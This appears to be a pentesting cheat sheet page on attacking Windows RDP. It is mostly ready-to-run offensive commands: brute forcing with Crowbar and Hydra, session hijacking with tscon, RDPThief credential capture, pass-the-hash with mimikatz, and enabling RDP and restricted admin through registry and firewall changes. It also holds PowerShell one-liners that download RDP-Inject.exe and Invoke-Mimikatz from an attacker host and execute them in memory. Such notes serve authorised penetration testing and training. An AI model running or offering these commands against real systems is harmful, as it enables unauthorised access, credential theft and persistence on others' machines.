Pentesting RDP

CROWBAR

Remote desktop protocol with Crowbar
- Crowbar is a network authentication cracking tool

sudo apt install crowbar

Make a suitable wordlist
Attempt to bruteforce RDP

crowbar -b rdp -s $host/32 -u admin -C /usr/share/wordlist/rockyou.txt -n 1 -v 
# -b protocol # -s target server 
# -n number of threads (RDP doesnt reliably handle multiple threads)

If errors are encountered like: File Not Found, convert the wordlist to UTF-8

iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt

RDP Session Hijacking

Must have SYSTEM privs

query user

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} 
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" 
net start sessionhijack

SHARP RDP

SharpRDP.exe computername=appsrv01 command="powershell -c IEX" username=corp\dave password=lab

RDP Thief

rdpthief.dll must be on the local machine
Modify C# source with the location of the hidden RDPThief.dll on disk
C# RDP-Inject.exe runs in a while loop and injects into each RDP process in order to capture credentials from RDP
Dump captured credentials

type C:\Users\User\AppData\Local\Temp\3\data.bin

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $data = $wc.DownloadData('http://192.168.49.124/RDP-Inject.exe');$assem = [System.Reflection.Assembly]::Load($data);$entryPointMethod = $assem.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))

The above command pulls RDP-Thief from a remote webserver and loads it via powershell reflection. Ensure you update the arguments in the above command

Screenshot the Desktop

You can take a screenshot of the desktop if NLA is disabled
with netexec

--nla-screenshot
--screenshot
--screentime SCREENTIME

Resolution with WxH Default 1024x768

--res RES

Enable RDP via Crackmapexec

nxc smb 10.129.203.121 -u julio -p Password1 -M rdp --options 
nxc smb 10.129.203.121 -u julio -p Password1 -M rdp -o ACTION=enable

Enable RDP via Registry

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall add rule name=3389 protocol=TCP dir=in localip=any localport=3389 action=allow

Enable RDP access for user

net localgroup "Remote Desktop Users" joe /add

Add-LocalGroupMember -Group 'Remote Desktop Users' -Member robert.lanza 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member john' 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member alice'

Remove Remote Desktop Access for user

Remove-LocalGroupMember -Group "Remote Desktop Users" -Member robert.lanza

If PTH is Disabled

Enable Restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

RDesktop

RDESKTOP

rdesktop 10.11.1.13 -u xxx -p xxx rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!'

Mount folders using RDesktop

rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' -r disk:linux='~/tools'

XFreeRDP

xfreerdp /v:$host /u:administrator /cert:ignore 
xfreerdp /v:10.11.1.31 /u:sa /p:poiuytrewq /cert:ignore

All security certificates should be ignored

xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
xfreerdp /v:10.11.1.247 /port:1234 /u:brett /p:ilovesecuritytoo

Mount a folder on our attacker machine to the target machine

mkdir /tmp/filetransfer
xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:~/tools

# ERROR: If you encounter the below error add the below switch
`[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED`
/tls-seclevel:0

Some other xfreerdp commands with options that have been helpful in the past

xfreerdp /v:manageengine /u:Administrator /p:studentlab /cert:ignore /tls-seclevel:0 /timeout:80000 /size:1920x1010 /scale:50
xfreerdp /u:blwasp /p:'Password123!' /v:10.129.230.38 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

FreeRDP 3 syntax is similar:

xfreerdp3 /v:TARGET /u:USER /d:DOMAIN.LOCAL /p:'PASSWORD' /cert:ignore
xfreerdp3 /v:TARGET /u:'.\LOCALUSER' /p:'PASSWORD' /cert:ignore

Pass The Hash RDP

xfreerdp /u:domain\username /pth: /v:$host

If PTH is disabled, enable restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Validate RDP Access with NetExec

When testing known users and passwords, use --no-bruteforce to try each username/password pair in order instead of spraying every password against every user:

netexec rdp targets.txt -d DOMAIN.LOCAL -u users.txt -p passwords.txt --no-bruteforce
netexec rdp TARGET -u USER -H NTLM_HASH --local-auth

RDP and WinRM authorization are separate. Credentials that work for RDP may still fail WinRM if the user is not allowed to use PowerShell remoting.

PTH RDP From a Windows machine

sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:"mstsc.exe /restrictedadmin"

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $wc.DownloadString('http://192.168.49.120/Invoke-Mimikatz.ps1') | IEX
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:mstsc.exe /restrictedadmin"'

Nmap

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

RDP Security Check

sudo cpan 
install Encoding::BER 
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check 
./rdp-sec-check.pl $host

Nmap Enumeration

Additional flags for RDP enumeration

nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n

NSE scripts: rdp-enum-encryption, rdp-ntlm-info — reveals OS version, domain name, and NTLM information from the RDP service

Hydra RDP Brute Force

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

BlueKeep (CVE-2019-0708)

Use-After-Free vulnerability in RDP (TCP 3389)
No authentication required — pre-authentication RCE
Achieves code execution as LocalSystem
Affects Windows 7, Windows Server 2008/2008 R2, Windows XP, Windows Vista
Approximately 950,000 hosts were initially vulnerable when disclosed

PreviousVulnerability Scanning NextPentesting MySQL

Last updated 1 month ago